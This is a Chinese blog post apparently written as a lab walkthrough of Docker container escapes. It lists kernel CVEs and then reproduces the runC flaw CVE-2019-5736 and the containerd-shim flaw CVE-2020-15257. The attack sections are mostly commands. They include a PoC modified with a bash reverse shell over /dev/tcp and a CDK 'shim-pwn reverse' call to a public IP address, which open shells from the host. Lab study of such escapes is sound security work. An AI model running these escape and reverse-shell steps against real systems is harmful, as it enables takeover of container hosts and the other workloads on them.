云原生-Docker安全-容器逃逸&系统内核漏洞(解决docker.com无法访问)

最新推荐文章于 2024-10-19 00:06:33 发布
最新推荐文章于 2024-10-19 00:06:33 发布
阅读量1k 收藏 14
点赞数 39
文章标签: 云原生 docker 安全 网络安全 容器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74402888/article/details/141268403
版权

云原生-Docker安全-容器逃逸&系统内核漏洞

细节部分在权限提升章节会详解,常用:

CVE-2016-5195 CVE-2019-16884 CVE-2021-3493

CVE-2021-22555 CVE-2022-0492 CVE-2022-0847 CVE-2022-23222

云原生-Docker安全-容器逃逸&docker版本漏洞

CVE-2019-5736 runC容器逃逸(需要管理员配合触发)

影响版本:

Docker version <= 18.09.2

RunC version <= 1.0-rc6

1、安装docker对应版本

apt-get update

apt-get install -y apt-transport-https ca-certificates curl software-properties-common

curl -fsSL https://mirrors.tencentyun.com/docker-ce/linux/ubuntu/gpg | sudo apt-key add -

sudo add-apt-repository "deb [arch=amd64] https://mirrors.tencentyun.com/docker-ce/linux/ubuntu $(lsb_release -cs) stable"

apt-get update

apt-cache madison docker-ce

apt-get install docker-ce=18.06.1~ce~3-0~ubuntu

docker --version

2、启动靶场环境测试

docker run -itd --cap-add=SYS_ADMIN ubuntu:latest

docker ps

docker exec -it 1f1532ed764b /bin/bash

ls -la /

3、编译修改后EXP后等待管理员进入容器执行

GitHub - Frichetten/CVE-2019-5736-PoC: PoC for CVE-2019-5736PoC for CVE-2019-5736. Contribute to Frichetten/CVE-2019-5736-PoC development by creating an account on GitHub.icon-default.png?t=N7T8https://github.com/Frichetten/CVE-2019-5736-PoC

bash -c 'exec bash -i >& /dev/tcp/127.0.0.1/8080 0>&1'

修改完毕后,要把这个main.go编译成main文件

CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build main.go

docker cp main c58ad026dad2:/

chmod 777 main

等待

管理员进入

docker exec -it 1f1532ed764b /bin/bash

上线成功了

4、实验获取云服务器上docker搭建的Web权限后进行逃逸

docker run -it -p 8888:8080 vulhub/struts2:s2-053

环境安装失败

CVE-2020-15257 containerd逃逸(启动容器时有前提参数)

响版本:

containerd < 1.4.3

containerd < 1.3.9

1、安装docker对应版本

apt-get update

# 安装必要依赖

apt-get install apt-transport-https ca-certificates curl software-properties-common

# 配置阿里源加速

curl -fsSL http://mirrors.aliyun.com/docker-ce/linux/ubuntu/gpg | sudo apt-key add -

# 增加仓库

add-apt-repository "deb [arch=amd64] http://mirrors.aliyun.com/docker-ce/linux/ubuntu $(lsb_release -cs) stable"

# 更新缓存

apt-get update

apt-cache madison docker-ce

apt-get install -y docker-ce=5:19.03.7~3-0~ubuntu-xenial docker-ce-cli=5:19.03.7~3-0~ubuntu-xenial containerd.io=1.2.4-1

docker version

2、启动环境测试:

docker pull ubuntu:18.04

docker run -itd --net=host ubuntu:18.04 /bin/bash  //--net=host是前提条件,不加这个参数启动的docker没有这个漏洞

docker exec -it 0e3f3d63e5da /bin/bash

3、上传CDK工具自动逃逸反弹

docker cp cdk_linux_amd64 0e3f3d63e5da:/tmp

chmod 777 cdk_linux_amd64

./cdk_linux_amd64 run shim-pwn reverse 111.230.109.74 5566  //这是指定漏洞利用

./cdk_linux_amd64 auto-escape id //自动化漏洞扫描

小春学渗透
关注
容器逃逸漏洞 Docker containerd-shim(CVE-2020-15257)复现与分析
SHELLCODE_8BIT的博客
04-08 3180
1.环境搭建 使用metarget搭建 git clone https://github.com/brant-ruan/metarget.git cd metarget/ pip3 install -r requirements.txt 2.安装靶场 ./metarget cnv install cve-2019-5736
云原生安全攻防》-- 容器攻击案例:Docker容器逃逸
07-14 833
当攻击者获得一个容器环境的shell权限时,攻击者往往会尝试进行容器逃逸,利用容器环境中的错误配置或是漏洞问题,从容器成功逃逸到宿主机,从而获取到更高的访问权限。在本节课程中,我们将详细介绍一些常见的容器逃逸方式,包括相应的检测方法和利用方式,帮助大家了解容器逃逸这种攻击手法的更多攻击细节。在这个课程中,我们将学习以下内容:常见容器逃逸方式:容器逃逸方式分类和简介。容器逃逸案例:详细介绍多个场景下...
Docker 容器逃逸漏洞 (CVE-2020-15257)复现
玄道的网安博客
12-27 1327
漏洞概述 containerd是行业标准的容器运行时,可作为Linux和Windows的守护程序使用。在版本1.3.9和1.4.3之前的容器中,容器填充的API不正确地暴露给主机网络容器。填充程序的API套接字的访问控制验证了连接过程的有效UID为0,但没有以其他方式限制对抽象Unix域套接字的访问。这将允许在与填充程序相同的网络名称空间中运行的恶意容器(有效UID为0,但特权降低)导致新进程以提升的特权运行。 影响版本 containerd < 1.4.3 containe...
docker逃逸漏洞总结
weixin_42588672的博客
02-13 48
Docker 逃逸漏洞主要有两种:第一种是由于容器中的应用程序的设计错误而导致的;第二种是由于容器安全设置不当而导致的。为了避免这两种漏洞,建议在部署容器时,应该采用一些安全的措施,如控制容器的访问权限、限制容器的网络通信等。 ...
容器逃逸漏洞分析 CVE-2019-5736
weixin_31610083的博客
01-01 1184
本文详细分析了基于runc覆写的经典容器逃逸漏洞(CVE-2019-5736),从理论分析漏洞利用路径到用strace采集具体的执行步骤,对该漏洞每一步的原理和行为进行剖析。
云上攻防-云原生篇&Docker安全&系统内核&版本漏洞&CDK自动利用&容器逃逸
qq_53058639的博客
07-06 954
1、云原生-Docker安全-容器逃逸&内核漏洞2、云原生-Docker安全-容器逃逸&版本漏洞3、云原生-Docker安全-容器逃逸&CDK自动化。
红队攻防渗透技术实战流程:云安全云原生安全内核漏洞版本漏洞
HACKONE的博客
05-21 622
常规检测:https://github.com/teamssix/container-escape-check。检测利用:https://github.com/cdk-team/CDK。-CVE-2020-15257 containerd逃逸。4、实验获取到docker搭建的Web权限后进行逃逸。#云原生-Docker安全-容器逃逸&CDK自动化。#云原生-Docker安全-容器逃逸&内核漏洞。#云原生-Docker安全-容器逃逸&版本漏洞。-CVE-2019-5736 runC容器逃逸
云原生进阶之容器】第五章容器运行时5.7--容器逃逸原理
junbaozi的专栏
04-11 761
容器逃逸,是指“流氓”容器尝试突破正常隔离环境限制,借助一些手段获得容器所在的直接宿主机、宿主机上的其他容器或集群内其他主机、其他容器的某种权限下的命令执行能力,进行恶意攻击或执行越权访问的行为。容器逃逸漏洞可能打穿容器节点,甚至整个集群。
Docker容器逃逸_--security-opt apparmor=unconfined,阿里开发7年大牛
m0_60707708的博客
04-05 351
当它加入到容器后,容器内的攻击者可以看到/proc目录下的runc进程,进而使用此进程的magic links这种特殊的符号链接找到宿主机上的runc程序,从而对该程序进行写入,实现写runc操作。那么,在runc exec加入到容器的命名空间之后,容器内进程已经能够通过内部/proc观察到它,此时如果打开/proc/[runc-PID]/exe并写入一些内容,就能够实现将宿主机上的runc二进制程序覆盖掉。进一步讲,就是在容器的各种命名空间内,受到各种限制(如cgroups)的情况下,启动一个进程。
云原生进阶之容器】第五章容器运行时5.3.1--runC简介与使用
junbaozi的专栏
04-01 770
随着容器技术发展的愈发火热,Linux基金会于2015年6月成立OCI(Open Container Initiative)组织,旨在围绕容器格式和运行时制定一个开放的工业化标准。该组织一成立便得到了包括谷歌、微软、亚马逊、华为等一系列云计算厂商的支持。而runC就是Docker贡献出来的,按照该开放容器格式标准(OCF, Open Container Format)制定的一种具体实现。
docker逃逸漏洞(CVE-2019-5736)
热门推荐
chaojixiaojingang
12-23 1万+
1.漏洞描述 2019年2月11日,runC的维护团队报告了一个新发现的漏洞,SUSE Linux GmbH高级软件工程师Aleksa Sarai公布了影响Docker, containerd, Podman, CRI-O等默认运行时容器runc的严重漏洞CVE-2019-5736。漏洞会对IT运行环境带来威胁,漏洞利用会触发容器逃逸、影响整个容器主机的安全,最终导致运行在该主机上的其他容器被入侵。漏洞影响AWS, Google Cloud等主流云平台。日前,该容器逃逸漏洞的PoC利用代码已在...
Docker 逃逸 漏洞复现
Jack_chao_的博客
03-27 1365
CVE-2020-15257-host模式容器逃逸漏洞分析
一个内核漏洞详解:容器逃逸
flynetcn的专栏
09-01 2299
CVE-2021-22555:一个影响2006年(Linux kernel v2.6.19-rc1 发布)至今(Linux kernel v5.12-rc8)的所有Linux内核版本漏洞,可导致本地提权与容器逃逸;该漏洞是个内核漏洞,跟Linux的发行版本没有关系,也就是说只要Linux 内核版本在v2.6.19-rc1 ~v5.12-rc8 之间的内核,都存在被黑客利用该漏洞攻击的可能。 该漏洞是由Andy Nguyen (theflow@)发现,于2021年07月16日发布。换句话说,该漏洞
云原生kubernetes系列--coredns篇】
weixin_58519482的博客
10-16 354
官网:https://coredns.io/CoreDNS是一个灵活、可扩展的 DNS 服务器,可以充当 Kubernetes 集群 DNS。与 Kubernetes 一样,CoreDNS 项目由CNCFcoredns在K8S中的用途,主要是用作服务发现,也就是服务(应用)之间相互定位的过程。
【分布式微服务云原生】《Redis 的高效之道:线程模型、IO 模型与 Reactor 模型全解析》
Dylaniou的博客
10-15 796
本文深入探讨分布式缓存 Redis 的 线程模型、IO 模型以及 Reactor 模型。详细介绍了 Redis 在不同版本中的线程变化、IO 模型的特点和工作流程,以及 Reactor 模型的基本概念、工作流程和特点。读者将深入了解 Redis 如何通过这些模型实现高性能和高并发处理,为更好地使用和优化 Redis 提供有力的理论支持。
【分布式微服务云原生】 选择SOAP还是RESTful API?深入探讨与实践指南
Dylaniou的博客
10-13 858
在本文中,我们深入探讨了SOAP与RESTful API的适用场景和安全性比较,并提供了一个SOAP通信的Java实现示例。选择SOAP还是RESTful API取决于您的项目需求、团队经验和技术偏好。我们鼓励您在评论区分享您的观点和经验,让我们一起探讨哪种技术更适合您的下一个项目!
【分布式微服务云原生】《Redis 大 Key 和热点 Key:问题与解决方案全攻略》
最新发布
Dylaniou的博客
10-19 803
Redis 中的大 Key 和热点 Key 都可能给系统带来一系列问题,但通过合理的设计和优化措施,我们可以有效地解决这些问题。在实际应用中,我们需要密切关注 Redis 的性能指标,及时发现大 Key 和热点 Key,并根据具体情况选择合适的解决方案。快来评论区分享你在处理 Redis 大 Key 和热点 Key 问题时的经验和技巧吧!让我们一起把 Redis 用得更溜!😉Redis 大 Key 和热点 Key 总结表格内容大 Key热点 Key定义。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值